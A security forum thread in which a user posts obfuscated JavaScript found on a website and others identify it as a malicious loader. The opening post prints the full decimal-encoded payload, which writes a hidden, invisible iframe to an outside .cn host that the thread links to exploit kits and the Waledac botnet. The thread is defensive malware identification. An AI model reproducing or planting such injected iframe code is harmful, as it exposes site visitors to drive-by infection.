Is this fishy script?

Talk about internet security, computer security, personal security, your social security number...
Post Reply
luntrus
Senior Member
Posts: 237
Joined: Sat Mar 21, 2009 6:29 pm

Is this fishy script?

Post by luntrus »

Hi forum members,

Whenever you see code of a certain nature, your NoScript ears start to stick out. So when I stumbled onto this row code I want to know: "Is this normal code or suspicious obfuscated malcode?

Code: Select all

 EDITED for SECURITY REASONS with * and ^[/scr*pt type="text/j*v*script"^var qhEHJJekBOuKGRbXCPKz = "ewLOJ60ewLOJ105ewLOJ102ewLOJ114ewLOJ97ewLOJ109ewLOJ101ewLOJ32ewLOJ119ewLOJ105ewLOJ100ewLOJ116ewLOJ104ewLOJ61ewLOJ34ewLOJ52ewLOJ56ewLOJ48ewLOJ34ewLOJ32ewLOJ104ewLOJ101ewLOJ105ewLOJ103ewLOJ104ewLOJ116ewLOJ61ewLOJ34ewLOJ54ewLOJ48ewLOJ34ewLOJ32ewLOJ115ewLOJ114ewLOJ99ewLOJ61ewLOJ34ewLOJ104ewLOJ116ewLOJ116ewLOJ112ewLOJ58ewLOJ47ewLOJ47ewLOJ104ewLOJ105ewLOJ116ewLOJ45ewLOJ115ewLOJ101ewLOJ110ewLOJ100ewLOJ101ewLOJ114ewLOJ115ewLOJ46ewLOJ99ewLOJ110ewLOJ47ewLOJ102ewLOJ105ewLOJ110ewLOJ100ewLOJ47ewLOJ105ewLOJ110ewLOJ46ewLOJ99ewLOJ103ewLOJ105ewLOJ63ewLOJ55ewLOJ34ewLOJ32ewLOJ115ewLOJ116ewLOJ121ewLOJ108ewLOJ101ewLOJ61ewLOJ34ewLOJ98ewLOJ111ewLOJ114ewLOJ100ewLOJ101ewLOJ114ewLOJ58ewLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ112ewLOJ111ewLOJ115ewLOJ105ewLOJ116ewLOJ105ewLOJ111ewLOJ110ewLOJ58ewLOJ114ewLOJ101ewLOJ108ewLOJ97ewLOJ116ewLOJ105ewLOJ118ewLOJ101ewLOJ59ewLOJ32ewLOJ116ewLOJ111ewLOJ112ewLOJ58ewLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ108ewLOJ101ewLOJ102ewLOJ116ewLOJ58ewLOJ45ewLOJ53ewLOJ48ewLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ58ewLOJ48ewLOJ59ewLOJ32ewLOJ102ewLOJ105ewLOJ108ewLOJ116ewLOJ101ewLOJ114ewLOJ58ewLOJ112ewLOJ114ewLOJ111ewLOJ103ewLOJ105ewLOJ100ewLOJ58ewLOJ68ewLOJ88ewLOJ73ewLOJ109ewLOJ97ewLOJ103ewLOJ101ewLOJ84ewLOJ114ewLOJ97ewLOJ110ewLOJ115ewLOJ102ewLOJ111ewLOJ114ewLOJ109ewLOJ46ewLOJ77ewLOJ105ewLOJ99ewLOJ114ewLOJ111ewLOJ115ewLOJ111ewLOJ102ewLOJ116ewLOJ46ewLOJ65ewLOJ108ewLOJ112ewLOJ104ewLOJ97ewLOJ40ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ61ewLOJ48ewLOJ41ewLOJ59ewLOJ32ewLOJ45ewLOJ109ewLOJ111ewLOJ122ewLOJ45ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ58ewLOJ48ewLOJ34ewLOJ62ewLOJ60ewLOJ47ewLOJ105ewLOJ102ewLOJ114ewLOJ97ewLOJ109ewLOJ101ewLOJ62";var wqfYyLudgHIXoMexWJhX = qhEHJJekBOuKGRbXCPKz.split("ewLOJ");var XbidtJBvZLvVCbuBmoeS = "";for (var wnqkAUhXdPuBrdekmggM=1; wnqkAUhXdPuBrdekmggM<wqfYyLudgHIXoMexWJhX.length; wnqkAUhXdPuBrdekmggM++){XbidtJBvZLvVCbuBmoeS+=String.fromCharCode(wqfYyLudgHIXoMexWJhX[wnqkAUhXdPuBrdekmggM]);}var VyodIJUOXMuOEyNuLfLF = ""+XbidtJBvZLvVCbuBmoeS+"";document.write(""+VyodIJUOXMuOEyNuLfLF+"")^/script^
Like to hear your views on the matter,

luntrus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.9 (KHTML, like Gecko) Iron/2.0.178.0 Safari/530.9
Top
Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Is this fishy script?

Post by Tom T. »

The only reason I can think of offhand for a single string of 1,737 characters is as an encryption key... and, uh, aren't those usually put into hex?
Especially when the entire string consists of

Code: Select all

ewLOJ*
repeated endlessly, where * = a two- or three-digit integer (decimal).

No code expert here, but I'd be very surprised if there were some legitimate, non-obfuscating use for such a string.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US at an expert level; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 diehard
Top
mik33mik
Posts: 18
Joined: Fri Mar 20, 2009 11:59 am

Re: Is this fishy script?

Post by mik33mik »

It's an obfuscated malicious script, in an invisible iframe, that redirect to a .cn site with a frame containing a porn site. This porn site has a javascript that redirect to a web server containing various exploits for adobe pdf reader, and flash player.
If the exploit is successful, your machine will become a zombie PC of the Waledac botnet.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009060816 Torfox/3.0.10
Top
User avatar
therube
Ambassador
Posts: 7929
Joined: Thu Mar 19, 2009 4:17 pm
Location: Maryland USA

Re: Is this fishy script?

Post by therube »

AVAST forum thread, my own website (that I built) suddenly has trojan horse - help!.

Oh, & if you do go about visiting the site in question, do use your head ;-).
(Earlier I found a different site with that same exploit, but can't seem to find it again?)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.19) Gecko/20110420 SeaMonkey/2.0.14 Pinball NoScript FlashGot AdblockPlus
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1pre) Gecko/20090601 SeaMonkey/2.0b1pre
Top
Tom T.
Field Marshal
Posts: 3620
Joined: Fri Mar 20, 2009 6:58 am

Re: Is this fishy script?

Post by Tom T. »

mik33mik wrote:It's an obfuscated malicious script, in an invisible iframe, that redirect to a .cn site with a frame containing a porn site. This porn site has a javascript that redirect to a web server containing various exploits for adobe pdf reader, and flash player.
If the exploit is successful, your machine will become a zombie PC of the Waledac botnet.
mik33mik, thank you, and it's nice to have an advanced detective here! :) ... since the exploit uses iFrames, JS, Flash, and Adobe pdf, then even those who went there, with NoScript in full lockdown (no scripting, no iframes, no Flash) and with Adobe JS disabled, as it should be for those who persist in using this unsafe PDF reader when safer ones are present, would still be protected, true? .. thanks again for detailed explanation.

btw, may we ask how you knew? are you in the anti-malware business also? Just curious.
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US at an expert level; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 diehard
Top
Post Reply

Return to “Security”